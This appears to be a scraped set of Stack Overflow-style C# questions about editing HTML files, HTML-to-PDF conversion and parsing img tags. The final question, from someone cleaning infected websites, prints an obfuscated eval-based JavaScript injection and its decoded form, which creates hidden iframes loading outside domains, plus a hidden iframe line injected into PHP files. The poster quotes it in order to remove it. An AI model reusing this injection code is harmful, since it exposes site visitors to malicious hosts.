How to read HTML template, replace text and convert back to HTML - c#

I am currently loading a html file from a filepath and reading it as text. I then replace certain characters in the file itself and I want to convert it back to html.
This is how I do it currently:
HtmlDocument document = new HtmlDocument();
document.Load(#message.Location);
content = document.DocumentNode.OuterHtml;
//Code to replace text
var eContent = HttpUtility.HtmlEncode(content);
When I debug and check what eContent holds, I can see newline characters like "\r\n". If I copy and paste the text into a .html file, only the text appears, not a proper html page.
I'm using Html AgilityPack already and am unsure of what else I need to do.
EDIT:
I have also tried
var result = new HtmlString(content);

HtmlAgilityPack is great to read and modify Html files you cannot create readable output.
Try with this

I have done this before using...
string savePath = "path to save html file, ie C://myfile.html";
string textRead = File.ReadAllText(#"Path of original html file");
//replace or manipulate as needed... ie textRead = textRead.Replace("", "");
File.WriteAllText(savePath, textRead);

Try to use ContentResult, which inherits ActionResult. Just remember to set ContentType to text/html.
[HttpGet]
public IActionResult FileToTextToHtml()
{
string fileContents = System.IO.File.ReadAllText("D:\\HtmlTest.html");
var result= new ContentResult()
{
Content = fileContents,
ContentType = "text/html",
};
return result;
}

Related

while downloading html in pdf,by using third party tool to convert an html page to pdf. getting error- Conversion error: Could not open url

while downloading html code into pdf in selectpdf software. im getting error saying - "Conversion error: Could not open url".im using selectpdf for converting html code to pdf. what is the base url i have to give .
using SelectPdf;
public partial class HtmlcodePrint : System.Web.UI.Page
{
string TxtHtmlCode;
protected void Page_Load(object sender, EventArgs e)
{
if (!IsPostBack)
{
TxtHtmlCode = #"<html>
<body>
Hello World from selectpdf.com.
</body>
</html>
";
}
}
protected void Btndownloadpdf_Click(object sender, EventArgs e)
{
// read parameters from the webpage
string htmlString = TxtHtmlCode;
string baseUrl = "http://localhost:51868/HtmlcodePrint.aspx";
string pdf_page_size ="A4";
PdfPageSize pageSize = (PdfPageSize)Enum.Parse(typeof(PdfPageSize),
pdf_page_size, true);
string pdf_orientation = "Portrait";
PdfPageOrientation pdfOrientation =
(PdfPageOrientation)Enum.Parse(typeof(PdfPageOrientation),
pdf_orientation, true);
int webPageWidth = 1024;
try
{
webPageWidth = Convert.ToInt32("1024");
}
catch { }
int webPageHeight = 0;
try
{
webPageHeight = Convert.ToInt32("777");
}
catch { }
// instantiate a html to pdf converter object
HtmlToPdf converter = new HtmlToPdf();
// set converter options
converter.Options.PdfPageSize = pageSize;
converter.Options.PdfPageOrientation = pdfOrientation;
converter.Options.WebPageWidth = webPageWidth;
converter.Options.WebPageHeight = webPageHeight;
// create a new pdf document converting an url
PdfDocument doc = converter.ConvertHtmlString(htmlString, baseUrl);
// save pdf document
doc.Save(Response, false, "Sample.pdf");
// close pdf document
doc.Close();
}
}
I know this is old, but I've been working with SelectPdf for a couple of days, so I'll throw in my 2 cents.
You probably don't need a baseUrl...
You don't have to give any baseUrl at all to the ConvertHtmlString function. You can just pass it the html string you want to convert and that's it.
Unless...
You only need to pass it a baseUrl if the html you're converting has relative paths in the external references (example: if you were referencing a stylesheet and wanted to use a relative path, you could provide the baseUrl to show where you wanted the stylesheet to be relative to). It's just so the converter can create the full absolute paths from the relative paths.
So...
If you don't need that functionality or just don't have external references in your html, then you can just use
converter.ConvertHtmlString(htmlString);
Also...
doc.Save(Response, false, "Sample.pdf");
may not be what you're looking for either. I only say this because the comments look like the same ones on the examples on the site for SelectPDF, so I'm assuming you copied the code from there (which is what I originally did too), in which case I want to let you know you don't have to save your PDF doc with that particular version of Save. It actually has 3 overloads to allow you to save your doc as:
a byte array (default)
a stream
a file
an HTTP response (the one you're using now, as shown in the examples from the site)
So, like I pointed out, you're using the one that saves the PDF as a HTTP response, so if you're wanting to save it as an actual PDF file directly, you'll need to change it to
doc.Save(fileName)
with the fileName variable as the absolute or relative path or file name you want to save the PDF to.
Hope this helps

Write in html with variables, then reset to default

im trying to edit an HTML i have created.
having the user typing something into the text box it will change the value but then I want it to reset.
I got the part of making the text change but it stays like that and when i try it for the 2nd time it does not work without me manually editing the .html file
here's my code:
const string fileName = "txt.html";
var content = File.ReadAllText(fileName);
content = content.Replace("{0}", textBox1.Text);
File.WriteAllText(fileName, content);
Process.Start(fileName);
I tried adding something like this after that code but its just opening with the variable ' {0} '
var content2 = File.ReadAllText(fileName);
content2 = content2.Replace(textBox1.Text, "{0}");
File.WriteAllText(fileName, content2);
you need a template html file, every time replace value using that template
const string fileName = "txt.html";
const string templateFileName = "txtTemplate.html";
var content = File.ReadAllText(templateFileName );
content = content.Replace("{0}", textBox1.Text);
File.WriteAllText(fileName, content);
Process.Start(fileName);

How to open txt file on localhost and change is content

i want to open a css file using C# 4.5 and change only one file at a time.
Doing it like this gives me the exception - URI formats are not supported.
What is the most effective way to do it ?
Can I find the line and replace it without reading the whole file ?
Can the line that I am looking and than start to insert text until
cursor is pointing on some char ?
public void ChangeColor()
{
string text = File.ReadAllText("http://localhost:8080/game/Css/style.css");
text = text.Replace("class='replace'", "new value");
File.WriteAllText("D://p.htm", text);
}
I believe File.ReadAllText is expecting a file path, not a URL.
No, you cannot search/replace sections of a text file without reading and re-writing the whole file. It's just a text file, not a database.
most effective way to do it is to declare any control you want to alter the css of as "runat=server" and then modify the CssClass property of it. There is no known alternative way to modify the css file directly. Any other hacks is just that.. a hack and very innefficient way to do it.
As mentioned before File.ReadAllText does not support url. Following is a working example with WebRequest:
{
Uri uri = new Uri("http://localhost:8080/game/Css/style.css");
WebRequest req = WebRequest.Create(uri);
WebResponse web = req.GetResponse();
Stream stream = web.GetResponseStream();
string content = string.Empty;
using (StreamReader sr = new StreamReader(stream))
{
content = sr.ReadToEnd();
}
content.Replace("class='replace'", "new value");
using (StreamWriter sw = new StreamWriter("D://p.htm"))
{
sw.Write(content);
sw.Flush();
}
}

how to find a image tags in source code using C#?

I am working with c# now stored webpage content in single variable and I have one text box if I paste any URL that will show the full source code the link .now I want to find all the image tags where it is begin and where it is finished.also I like to merge except image tags .
can you anyone tell me how to do..
Assuming you want to parse the content server-side you can use the Html Agility pack
See this question
Try This:
var images = doc.DocumentNode.SelectNodes("//img");
if (images != null)
{
foreach (HtmlNode image in images)
{
var alt = image.GetAttributeValue("alt", "");
var nodeForReplace = HtmlTextNode.CreateNode(alt);
image.ParentNode.ReplaceChild(nodeForReplace, image);
}
}
var sb = new StringBuilder();
using (var writer = new StringWriter(sb))
{
doc.Save(writer);
}

Can a file be read and written right back with small changes without knowing its encoding in C#?

I need to download from FTP over 5000 files being .html and .php files. I need to read each file and remove some stuff that was put there by virus and save it back to FTP.
I'm using following code:
string content;
using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true)) {
content = sr.ReadToEnd();
sr.Close();
}
using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8))
{
sw.WriteLine(content);
sw.Close();
}
I downloaded some files by hand and some have <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" /> but I wouldn't want to assume all of them are like that. I checked with Notepad++ and some text files are ANSI. PHP seems to be UTF-8 and HTML Windows-1250 but I would prefer to be sure to not break the files while trying to fix it. So is there a way that I wouldn't have to know/guess the encoding and it would let me remove virus links from web pages?
Edit. I'm trying to find and remove something like this:
var s=new
String();try{document.rvwrew.vewr}catch(q){r=1;c=String;}if(r&&document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u,
59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,82/u,29.5*u,204/u,
23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];if(document.createTextNode)with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{doc.qwe.removeChild()}catch(q){e(s);}
which after decoding is
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://fiberastat.com/temp/stat.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
And when you visit webpage it tells you this (after decoding).
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://vtempe.in/in.cgi?17');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
The script is added at last 3 lines and basically starts right after </html>var
The PHP script has more or less this type of line <iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe> but it can be anywhere in the file.
Not sure if there's any other way then to rewrite those files. But having to go thru 5000 files seems a bit too much and risky :-)
Assuming that none of the files are UTF16 or UTF32, and that the parts that you want to interact with are entirely 7-bit ASCII, you can open and save it as Encoding.Default, which will round-trip any higher character correctly.
The virus didn't need to know the file encoding in order to add its content to your files so it is obviously possible. Rather than treating the file as text, couldn't you just process it as a binary file and search for patterns that match what the virus added?

Categories

Resources